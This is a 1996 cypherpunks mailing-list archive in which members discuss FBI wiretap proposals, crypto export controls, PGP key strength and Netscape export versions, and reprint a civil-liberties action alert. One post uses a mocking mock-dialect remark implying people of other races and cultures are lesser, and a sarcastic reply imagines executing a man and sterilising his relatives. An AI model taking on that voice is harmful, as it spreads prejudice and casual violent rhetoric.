-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMgBe+MVrTvyYOzAZAQHoygP/ZeEn00d+uAuJXp29igeMTPe0U8muD3uy
tIZItV2e05D9VLaCNdzZKiK9pqGsjA6VzB1sUd8uRUtPu0GKVGrylgjuA/QoK/m6
xOMGLNcvPZVhVbqGMCkFXwR6U5KifMd1mAb14Au25MR7hpfzpCwMBQZ5y495AhRx
utMueAGDmIo=
=OARQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 07:33:41 +0800
To: cypherpunks@toad.com
Subject: (Un)Freeh makes claims on wiretapping
Message-ID: <01I7RMDU1JC48Y4XOW@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	The usual governmental rhetoric. Again, I'm not seeing achnowledgement
from anyone except maybe the ACLU that there's no evidence that such tactics
would have stopped the TWA bombing - not that they would be justified even if
it would have. Legalized drugs, etcetera would free up quite enough law
enforcement to take care of the problem.
	-Allen

>   Cobb Group - Netscape

>           FBI DIRECTOR: WIRETAP PROPOSALS WON'T THREATEN LIBERTIES

>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Associated Press
   
>   WASHINGTON (Aug 1, 1996 1:41 p.m. EDT) -- FBI Director Louis Freeh
>   said today Americans are under increasing attack by terrorists and
>   proposed new wiretapping authority would not greatly expand
>   government's powers.
   
>   "The country and the American people have been experiencing an
>   increasing war against them by terrorists and terrorist-supported
>   activities," Freeh told a Senate Intelligence Committee hearing.
>   Americans "are clearly under attack and we are the prime targets for
>   this kind of terrorism."
   
[...]

>   Freeh said the wiretap proposals do not involve "expansive powers" for
>   the government and would not lead to "an avalanche of new electronic
>   surveillance."
   
>   A leading GOP opponent of an earlier, more sweeping anti-terrorism
>   bill said today he didn't believe Congress could enact a new package
>   before its recess this weekend.
   
>   "I think it would be very difficult to do in light of the logistics
>   and the opposition," Rep. Bob Barr, R-Ga., told reporters. "The
>   (anti-terrorism) funding is there. No new laws are needed."
   
>   Asked about Barr's comments, Sen. Larry Craig, R-Idaho, head of a
>   bipartisan task force that has been negotiating with administration
>   officials on the anti-terrorism proposals, said, "That's part of the
>   obstacle. It's what we have to deal with. What we do has to reach the
>   level of consensus."
   
>   The negotiators, led by Craig and White House chief of staff Leon
>   Panetta, said they hoped to have a package ready for a vote by week's
>   end before Congress leaves for its August recess.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 2 Aug 1996 09:36:44 +0800
To: cypherpunks@toad.com
Subject: Freeh slimes again: Digital Telephony costs $2 billion now ...
Message-ID: <199608012258.PAA29066@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


Louis Freeh is now asking the Congress for $2 billion to fund
Digital Telephony.  Yes, that is FOUR TIMES what he said it
would cost the taxpayers to give up their own privacy.  Score
one for the cynics who said $500 million was not enough.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Fri, 2 Aug 1996 09:35:55 +0800
To: sameer <sameer@c2.net>
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <199608011714.KAA08903@clotho.c2.org>
Message-ID: <3201376A.2847@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
>> The only thing they can revoke is their permission to provide it for
>> download over the internet.  They can't revoke our permission to sell
>> it in stores or via snail mail.
> 
>         Where do you get this idea? Got an inside track into the minds
> of the supreme court?

The "they" mentioned above is the State Department.  Congress can try
to do anything.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Fri, 2 Aug 1996 09:51:11 +0800
To: cypherpunks@toad.com
Subject: Re: Terror attack!
In-Reply-To: <32010AC5.1513@vail.tivoli.com>
Message-ID: <m2u3um7le9.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Mike" == Mike McNally <m5@vail.tivoli.com> writes:

Mike> Why don't they just be done with it and declare martial law?
	
Wait 'til after the election.
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Fri, 2 Aug 1996 08:40:28 +0800
To: cypherpunks@toad.com
Subject: ALERT: Congress rushing to pass surveillance plan!  Call now! (8/1/96)
Message-ID: <199608012049.QAA13473@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


======================================================================
 ____  _____ ____     ___  _     _____ ____ _____ 
|  _ \| ____|  _ \   / _ \| |   | ____|  _ \_   _|  CONGRESS RUSHING TO
| |_) |  _| | | | | | |_| | |   |  _| | |_) || |    ENACT SURVEILLANCE
|  _ <| |___| |_| | |  _  | |___| |___|  _ < | |    LEGISLATION.  CALL
|_| \_\_____|____/  |_| |_|_____|_____|_| \_\|_|    CONGRESS NOW! 8/1/96

		REPOST THIS ALERT WHERE APPROPRIATE
	     DO NOT REDISTRIBUTE AFTER AUGUST 7, 1996
----------------------------------------------------------------------
Table of contents
	Introduction
	What you can do now	
	Background
	Participating organizations
----------------------------------------------------------------------
INTRODUCTION

Late Wednesday, Congress and the Clinton Administration reached a
preliminary agreement on a sweeping new surveillance initiative. The
President and several Congressional leaders are pushing for a vote on the
measure BEFORE CONGRESS RECESSES ON AUGUST 2.

If enacted, parts of the proposal would dramatically impact privacy and
security on the Internet and other advanced communications technologies.

Of particular concern are provisions which:

1. Allows law enforcement to wiretap "suspected terrorists" for up to
   48 hours BEFORE obtaining a court order
2. Provide funding for the Digital Telephony Proposal without any public
   accountability over how the FBI spends the funds

Other provisions are also circulating that would:

3. Threaten to impose new restrictions on encryption technologies
4. Seek to criminalize the distribution of 'bomb-making' information on
   the Internet that is legal in print.

Congress needs to hear from you.  Congress will rush through the passage
of massive new surveillance plans with privacy risks unless you
show them there is support for slow, deliberate, reasoned thought on
the issue.

----------------------------------------------------------------------
WHAT YOU CAN DO NOW

	         CALL KEY MEMBERS OF CONGRESS IMMEDIATELY!
	              NO LATER THAN FRIDAY (8/2/96)

Please contact as many elected officials on the list below as you can.
Urge them to "go slow" and carefully consider the impact these
surveillance proposals will have on the privacy and security of
all Internet users.

Tell them while you appreciate their concern about combating terrorism,
the measures being proposed have many potential side effects which must be
carefully considered.

1. Call the key members of Congress below and ask them to "go slow" and
   examine the issues before rushing into changing the delicate balance
   of law enforcement surveillance and the public.

2. If you are at a loss for words, use the following sample communique:

	SAMPLE COMMUNIQUE

	Dear _________,

	Please do not rush the passage of counter terrorism legislation;
	I'm concerned that Congress is rushing without carefully
	considering the implications of privacy.  I'm from <city, state>.

	Thanks, <click>

   You should call the following members of Congress because they
   are steering this legislation and need to hear there is support
   for slow, deliberate, thoughtful consideration of this issue.
   Some of thee members *have publicly expressed reservations* about this
   legislation, and we should support them in their efforts.

Senate members:

      P ST Name and Address           Phone           Fax
      = == ========================   ==============  ==============
      R MS Lott, Trent                1-202-224-6253  1-202-224-2262
      D DE Biden Jr., Joseph R.       1-202-224-5042  1-202-224-0139
      D SD Daschle, Thomas A.         1-202-224-2321  1-202-224-2047
      R UT Hatch, Orrin G.            1-202-224-5251  1-202-224-6331
      R PA Specter, Arlen             1-202-224-4254  1-717-782-4920
      D VT Leahy, Patrick J.          1-202-224-4242  1-202-224-3595

House members:

   Dist ST Name, Address, and Party       Phone            Fax
   ==== == ========================       ==============   ==============
      6 GA Gingrich, Newt (R)             1-202-225-4501   1-202-225-4656
      3 MO Gephardt, Richard A. (D)       1-202-225-2671   1-202-225-7452
      6 IL Hyde, Henry J. (R)             1-202-225-4561   1-202-226-1240
     14 MI Conyers Jr., John (D)          1-202-225-5126   1-202-225-0072

President William Clinton:
	White House Comment Line: 1-202-456-1414

3. If you get a response, take a moment and send mail to vtw@vtw.org
   with "feedback" in the subject line.

	$ Mail vtw@vtw.org
	Subject: my feedback from calling Congress
	They said they're not going to pass most of Clinton's package,
	because it upsets the delicate balance between law enforcement and
	the public. 
	^D
	Mail sent!
	
----------------------------------------------------------------------
BACKGROUND

Among other things, the law enforcement proposals circulating on Capitol
Hill include provisions which:

o WIRETAPPING WITHOUT COURT ORDER ALLOWED FOR 48 HOURS

  Congress and the President have already agreed to provisions which
  would dramatically expand law enforcement surveillance authority. Both
  of these provisions were proposed by the President as part of the 1995
  counter-terrorism legislation, but were dropped from the final bill
  after Republicans and civil liberties advocates objected.

  The current proposal would expand law enforcement surveillance
  authority in two ways:

  - Emergency 48 Hour Wiretap Authority: Current law requires law
    enforcement officials to get the affirmative consent of a judge
    before installing a wiretap.

    The current proposal would expand law enforcement authority to
    wiretap "suspected terrorists" for up to 48 hours before obtaining a
    court order, limiting a critical 4th amendment safeguard.

  - Multi-Point "Roving" Wiretaps: Current law allows law enforcement to
    tap only specific LOCATIONS (i.e., a telephone number). In certain
    very limited circumstances, law enforcement can tap a specific
    INDIVIDUAL if it can be shown to a judge that the suspect is moving
    from place to place with the specific intent of thwarting law
    enforcement.

  The current proposal would expand this so-called "roving" wiretap
  authority by making it much easier for law enforcement to tap specific
  INDIVIDUALS as opposed to specific physical locations.  This change
  would dramatically effect the balance between 4th Amendment privacy
  rights and public safety which has existed for nearly 30 years, and
  should not be enacted without careful consideration of the
  implications.

o FUNDING FOR DIGITAL TELEPHONY WITHOUT PUBLIC ACCOUNTABILITY

  The Administration and Congress are seeking funding to implement the
  Digital Telephony Law in a way which eliminates any opportunity for
  public oversight of law enforcement surveillance ability.

  The controversial law, known officially as the Communications
  Assistance for Law Enforcement Act (CALEA), granted the FBI new
  authority to influence the design of telecommunications networks.  At
  the same time, the law provided substantial public oversight over the
  FBI's surveillance ability by requiring the FBI to state, on the
  public record, what its surveillance needs are.

  The FBI has faced stiff resistance from civil liberties groups and some
  members of Congress and has not yet been able to obtain funding to
  implement the requirements of the law.

  As part of the current proposal, the FBI is seeking a mechanism which
  will provide funding for CALEA in a way which skirts the public
  oversight provisions of the law.  This is an extremely troubling move
  by law enforcement which, if enacted, would allow law enforcement
  essentially unlimited authority to influence the design of
  telecommunications networks without any accountability.

Other provisions which could show up in legislation in the next 72 hours are:

o BOMB MAKING MATERIAL ON THE INTERNET

  In the wake of the recent public concern about terrorism, Senators
  Dianne Feinstein (D-CA) and Joseph Biden (D-DE) have renewed their
  efforts to pass legislation to restrict the availability of 'bomb-
  making' information on the Internet.

  The Feinstein/Biden amendment was added to the Senate Defense
  Appropriations bill (S. 1762) in early July, and is not currently part
  of the new law enforcement initiative.  However, the amendment poses a
  serious threat to chill the the free flow of information on the
  Internet.

o THREATEN TO IMPOSE NEW RESTRICTIONS ON ENCRYPTION TECHNOLOGIES:

  While no specific legislation has been proposed, the Clinton
  Administration has circulated an outline to Congress which states:

    "We will seek legislation to strengthen our ability to
    prevent terrorists from coming into the possession of the technology
    to encrypt their communications and data so that they are beyond the
    reach of law enforcement."

  This statement marks the first time that the Administration has
  suggested legislation to restrict encryption.  This is especially
  troubling because it comes at a time of growing Congressional support
  for legislation to promote privacy and security tools for the Net.
  Of even more concern, the Administration is clearly attempting to use
  the recent suspected terrorist incidents to push for a new and more
  restrictive encryption policy.

  If the Administration succeeds in passing new restrictions on
  encryption as part of the new surveillance legislation, the future
  of the Internet as a secure and trusted platform for commerce and
  private communication will be threatened.

Some or all of these provisions may be included in a package voted
on by both houses by August 3rd.  It is not clear what a final bill
will look like, and some of these provisions may not be considered by
Congress until later this summer.

----------------------------------------------------------------------
PARTICIPATING ORGANIZATIONS

The following organizations all urge you to take this action to combat the
surveillance initiatives.   Check their pages for more background
information on these issues.

	American Civil Liberties Union (http://www.aclu.org)
	American Communication Association
	Center for Democracy and Technology (http://www.cdt.org)
	Electronic Frontier Foundation (http://www.eff.org)
	EF-Austin (http://www.efa.org)
	Electronic Privacy Information Center (http://www.epic.org)
	Feminists for Free Expression
	National Libertarian Party (http://www.lp.org)
	National Writers Union (http://www.nwu.org/nwu/)
	People For the American Way (http://www.pfaw.org)
	Voters Telecommunications Watch (http://www.vtw.org)
	Wired Ventures Ltd. (http://www.hotwired.com)
======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Brothers <johnbr@atl.mindspring.com>
Date: Fri, 2 Aug 1996 08:17:22 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: A Libertine Question
Message-ID: <1.5.4.32.19960801204953.006b2b7c@pop.atl.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:23 AM 8/1/96 -0400, you wrote:
>John Brothers,
>
>Which locality do you live in?  I've got all this toxic waste that I've 
>been collecting in return for receiving large sums of money, I'd like to 
>get rid of it as cheply as possible. I thought I might just burn it in a 
>good  "true" libertarian neighborhood.
>
>You don't mind, do you?

I live in the Alpharetta area of Georgia, a northern suburb of Atlanta.  You're
welcome to come here and burn whatever you like.  



Oh, of course, I assume that you'll be properly and safely capturing and
disposing the toxic ash.  Because, after all, if a single microgram
of those toxins were to land on my property, I would be forced to sue you, 
take all of that money, and set up a legal robot to continue to sue your
descendents for the next seven thousand generations.  

And, I guess if the investigation were to show that you were criminally
negligent in the proper disposal of those toxins, you would have to be
punished.   Speaking for myself as a darwinist libertarian, the only
fitting punishment to being criminally negligent on such a grand scale
would be to execute you, and sterilize every known trace of your genetic code 
in the gene pool - i.e. all genetic children, brothers, sisters, parents and
so forth.  You may have some illegitimate/secret offspring or siblings which
may survive, but we can't go around tracking everyone's genetic code.. It would
be an affront to privacy, and libertarianism in general.  

I'm sure that your lawyer could probably argue the case down to the point
where the only punishment would be your execution, and I guess that would
have to suffice - your family wasn't directly involved in the planning and
execution of this most heinous crime. 

But, I'm sure that you would be a properly responsible citizen, and clean
up carefully after yourself.  It might smell bad, and be a generally unpleasant
place, but as a libertarian, I don't have a right to control what you do
with your property, nor to object to bad smells - I can purchase filters
and such to avoid that.  And if it got unpleasant enough, I would just move
away, and leave you and your bad smells alone.  

Have a nice day,
 
---
John Brothers 
   Do you have a right not to be offended?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Brothers <johnbr@atl.mindspring.com>
Date: Fri, 2 Aug 1996 08:08:40 +0800
To: cypherpunks@toad.com
Subject: Re: Jewell is the Militia Bomber!!!!
Message-ID: <1.5.4.32.19960801205207.006acf90@pop.atl.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 PM 7/31/96 -0800, Jim Bell wrote:
>At 07:49 PM 7/31/96 -0700, Timothy C. May wrote:
>>2. They found a _shotgun_ in his cabin.
>
>No, no, Tim.   The proper way to deliver this to a TV audience is, "They 
>found an ARSENAL in his COMPOUND!"
>(see how much more exciting it is?!?  BTW, how many wives does he have?)

None!  and he lives with his mother!  Obviously a complete sicko!

:)
---
John Brothers 
   Do you have a right not to be offended?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 2 Aug 1996 08:29:11 +0800
To: cypherpunks@toad.com
Subject: Re: Is 1024-bit PGP key enough?
In-Reply-To: <199608012016.WAA00739@basement.replay.com>
Message-ID: <9608012108.AA17627@bart-savagewood.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi,

> Is security provided by 1024-bit PGP key sufficient against most powerful
> computers that are available today? Say if smoe organization spent 10
> billions of dollars on a cracking machine, would it be possible to crack 
> the keys in reasonable time?

Well, this depends on a couple of definitions.  For example, how do
you define "reasonable time"?  The most concise answer I can give you
is "we don't know".  An answer that would make you feel more
comfortable is that we believe that factoring a 1024-bit key using
GNFS is about 300,000 times harder than factoring a 512-bit key using
GNFS.

This doesn't take into account increase in computer power.  If you
take into account increase in technology at the current rate, doubling
every 18 months, then a 1024-bit key should be breakable in about 100
years.

However this doesn't take into account increases in algorithms.  There
is no way to predict the discovery of a new factoring algorithm.  In
addition, there is no way to predict a computational discovery which
might increase the base technology faster than the current trend.

To get back to your question: If smoe [sic] organization spent 10
billions [sic] of dollars on a cracking machine, would it be possible
to crack the keys in a reasonable time?

Well, lets assume a P100 is 50 MIPS and costs $500.  Then the $10B
would purchase 20 million machines.  Discounting the storage
requirements (factoring a number this large will probably require on
the order of hundreds of GBs of storage) and end-time processing power
(unknown) required to factor a 1024-bit number, this set of machines
would provide "enough" relations for a 1024-bit number in about 1.5
years per key.

- -derek

PS: These are napkin-style numbers, and I'm making a lot of
assumptions here...  I assume no responsibility if you use these
numbers and they are wrong.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQBuAwUBMgEcrTh0K1zBsGrxAQGNaALEDEtO8/pXZPp134SBcjUqD3NO2P3siirR
8a4pA6S15fwtVDrl2ZWeZb2XL65hbhcWpZ2s6Q3eaQOvFPOiytLtfcujUFV7ef+i
9zJKgUlUFMkOP9fmhZdjZXA=
=gPv4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 2 Aug 1996 11:08:10 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: POLL
Message-ID: <Pine.SUN.3.91.960801171855.20425I-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

The electronic newsletter put out by the TV show, C-NET Central, 
had this item in the most recent issue:

------------------------------------------------------------------

5. "YOUR TURN": SHOULD YOU BE ABLE TO READ BOMB-MAKING INFO?

The United States and seven other governments are moving to
"felonize" distribution of bomb-making information on the Net
and other electronic media. Yet censorship of the Net was
recently dealt a double blow by twin defeats of the
Communications Decency Act. Is this strictly a free speech
issue? Or is there a difference in your mind between pictures of
naked people and blueprints for a pipe bomb? And can the Net
know the difference?

To contribute your opinion, phone CNET at 415/395-7805, enter
extension 5400, and leave a message. We'll listen to the
responses and broadcast some of the best on CNET radio.

Each week Digital Dispatch brings you the new "your turn"
question, and each Wednesday you can hear the responses to the
previous week's question on CNET radio:

		http://www.cnet.com/Content/Radio/

-----------------------------------------------------------------

Some of you may have a comment about this subject.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Fri, 2 Aug 1996 11:11:50 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: The "Secure" version of Netscape for Linux is *NOT*
In-Reply-To: <2.2.32.19960801033402.00fc1ab8@mail.teleport.com>
Message-ID: <32014B0A.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen wrote:
> 
> I just installed the "secure" version of Netscape off of the "US Only"
> download site.
> 
> Seems that it is actualy the international version and not the 128 bit
> version.

What makes you think you got the export version?

Here's one way to find out.  If you look in the Security Preferences
panel under the Options menu, there are two "Configure" buttons for
configuring what ciphers are enabled for SSL 2 and SSL 3.  The domestic
version supports a greater variety of options, including triple DES.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 2 Aug 1996 11:29:22 +0800
To: cypherpunks@toad.com
Subject: Re: Tolerance
In-Reply-To: <199608012148.OAA21170@cygnus.com>
Message-ID: <199608020041.RAA07308@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone wrote:

> Just a comment to all of the 'true libertarians' out there, especially
> the "defend to the death" types:  How many of you defended Mr.
> Sternlight's recent membership?

There is nothing to defend.  Anyone, including Dr. Sternlight, may
join this list at any time by mailing a "Suscrive" message to 
toad.com, and may leave it at any subsequent time by sending another 
message that says "unSuscrive."  

It's totally user-operated.  No intervention by anyone else required. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 2 Aug 1996 10:07:10 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: Terror attack!
In-Reply-To: <32010AC5.1513@vail.tivoli.com>
Message-ID: <Pine.SOL.3.91.960801175240.3254A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Aug 1996, Mike McNally wrote:
> 
> Why don't they just be done with it and declare martial law?
> 	

Be patient.  They're working on it.

bd

Reuters, 8/1/96:

FBI Director Louis Freeh warned Congress on
Thursday that the United States was under attack from foreign terrorists and
said new counter-terrorism weapons were needed to fight back.

...

On the Atlanta bomb that caused two deaths and wounded 111 people, he said
the FBI had no evidence "of an international terrorist group or a 
sophisticated group targeting the Olympics in general with respect to 
that incident."

But he said the United States was clearly vulnerable to possible future
terrorist attacks involving nuclear, biological and chemical weapons. He said 
he had recently met Marine Corps Commandant Gen. Charles Krulak to discuss a
possible joint FBI-Marine study on ways of countering weapons of mass
destruction.

...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 11:39:12 +0800
To: cypherpunks@toad.com
Subject: Re: Tolerance
Message-ID: <ae26a3bb0d021004aa87@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 PM 8/1/96, Chris Adams wrote:
>Just a comment to all of the 'true libertarians' out there, especially
>the "defend to the death" types:  How many of you defended Mr.
>Sternlight's recent membership?
>

I certainly did, as you all know.

But, to clear things up, I don't think I've ever in my life uttered the
phrase "defend to my death your right...."

(I don't think asking the 1000+ members of this list to say one way or
another is a good idea.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 12:00:27 +0800
To: cypherpunks@toad.com
Subject: Viet Nam Considered Less Harmful than Cambodia
Message-ID: <ae26a67e0f021004507b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(Welcome back, David...I haven't seen you post in a long while)

At 6:44 AM 8/1/96, David K. Merriman wrote:

>Were a government - duly elected - to come into power similar to that in
>30's Germany or 70's Viet Nam, so that intellectuals or the educated
>became the targets of oppression, would she be as adamant about the
>perceived "rights" of Government to intrude in her private life, monitor
>her communications, and so on?

Though I am no defender of the People's Benovolent and Democratic
Government of Viet Nam, I think you must be thinking of Cambodia.

It was Cambodia, in the form of Pol Pot and the Khmer Rouge, which decided
to exterminate all educated persons (except themselves, of course). Those
wearing eyeglasses were considered Enemies of the People, because
presumably they knew how to read.

Compared to Cambodia, Viet Nam was a paradise. In fact, I cheered in '79
when Viet Nam invaded Cambodia.

--Tim May, who wonders if anyone with access to the Net will become part of
the mountains of skulls in Pax Americana

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 12:01:29 +0800
To: cypherpunks@toad.com
Subject: Re: Freeh slimes again: Digital Telephony costs $2 billion now ...
Message-ID: <ae26a88610021004cab0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 PM 8/1/96, Ernest Hua wrote:
>Louis Freeh is now asking the Congress for $2 billion to fund
>Digital Telephony.  Yes, that is FOUR TIMES what he said it
>would cost the taxpayers to give up their own privacy.  Score
>one for the cynics who said $500 million was not enough.

And when this $2 B is defeated by encryption, look for dramatic, drastic,
and draconian restrictions on crypto.

(With the Internet Phone deals--even Intel is entering the market--why are
there no widespread uses of PGP or S/MIME? Yes, I know about about PGPhone,
and also the Nautilus product, but none seem to be used by anyone I know.
Maybe we should spend some time talking about the practical realities of
these tools.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 13:54:38 +0800
To: cypherpunks@toad.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
Message-ID: <ae26a9fa11021004221a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 PM 8/1/96, David Lesher wrote:
>Tom Weinstein writes:
>
>> We only ship the domestic version to addresses inside the US.  They
>> State Department seems to think this is sufficient.  Of course, a
>> foreign person can always fly here and pick up a copy at Fry's, but
>> that's not our problem.
>
>Or just walk out of a Mission, and buy one on K Street.
>
>But it's easier to just get an account on an ISP.
>
>I recall several chats with a .nl UN Mission Staffer. He was on
>Panix or PSI or such. Maybe we should require proof of citizenship
>before granting a license to use IP.

I know some Russians, through various connections in the Valley. They
routinely stock up on software at Fry's, in Sunnyvale, Palo Alto, etc.,
load up their suitcases, and then fly back to Moscow. (Of course, the bulk
is not too great, because they only buy one copy of each program....)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Fri, 2 Aug 1996 12:37:21 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <199608020153.SAA00324@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally wrote:

>That reminds me:  I thumbed through BiBi's terrorism book (the one D.S.
>certified as prerequisite reading for particpation in intelligent
>discussions about something-or-other) at B&N the other day.  It's a
>pretty thin book.  Most of it seems to be about the rise of the Moslem
>Menace and how the Sultan's hordes will soon be upon us all.  The last
>chapter outlines all the "necessary measures" governments must take
>to stamp out the wildfire of terrorism.  Same old same old, mostly,
>like allowing suspects to be held without charges, allowing warrantless
>searches (I think), thorough weapon registration, and so on.  The last
>one (or next-to-last; I think the last one is "brainwash the populace
>into thinking this is all a good idea") is about establishing a 
>periodic "civil liberties review panel".
>
>Yeah right.

OK.  But I sure would like to have an automatic weapon for
self/home/"national" defense w/o going through a tremendous amount of B.S.
(as Israelis are excused from).  I believe that you Texans and we Arizonans
have the privilege; in "urban" states, where the need truly is, good luck.

Also, I don't know what your experience in the Middle East is.  Me, I worked
in Iran and exited just before the Jan. '79 "revolution".  Menace & murder.
You *really* have no idea.  Hint:  I'm alive.

If you still (I don't know your age) think that humans are all the same, but
we juss gots diffrunt colors 'n' cultures, I *strongly* recommend an
extended period of travel to the third world.

In all sincerity,

Dave





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Fri, 2 Aug 1996 05:50:07 +0800
To: hua@chromatic.com (Ernest Hua)
Subject: Re: algorithms for verifying U.S. IP address ...
Message-ID: <199608011712.TAA15658@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua (hua@chromatic.com) wrote:
: How does one verify that an IP address is coming from a U.S. site?
: How do most FTP site (e.g. those which carry crypto) determine the
: origins of a connection?

What's the use ? It makes it only nominally more difficult to access
an US crypto site, one needs first to esthablish an US beachhead ie.
open an US account, and ftp the eleet crypto warez using the newly
created US account as an intermediary. 

So the next step will be a tag that a user is an 'alien' ?

bEST Regards,
--
  Alex de Joode  | Replay IP Service & Web DZign  --  The Netherlands
usura@replay.com | http://www.replay.com       mailto:info@replay.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 2 Aug 1996 09:42:11 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: FPGAs and Heat (Re: Paranoid Musings)
In-Reply-To: <199608011848.LAA11828@netcom13.netcom.com>
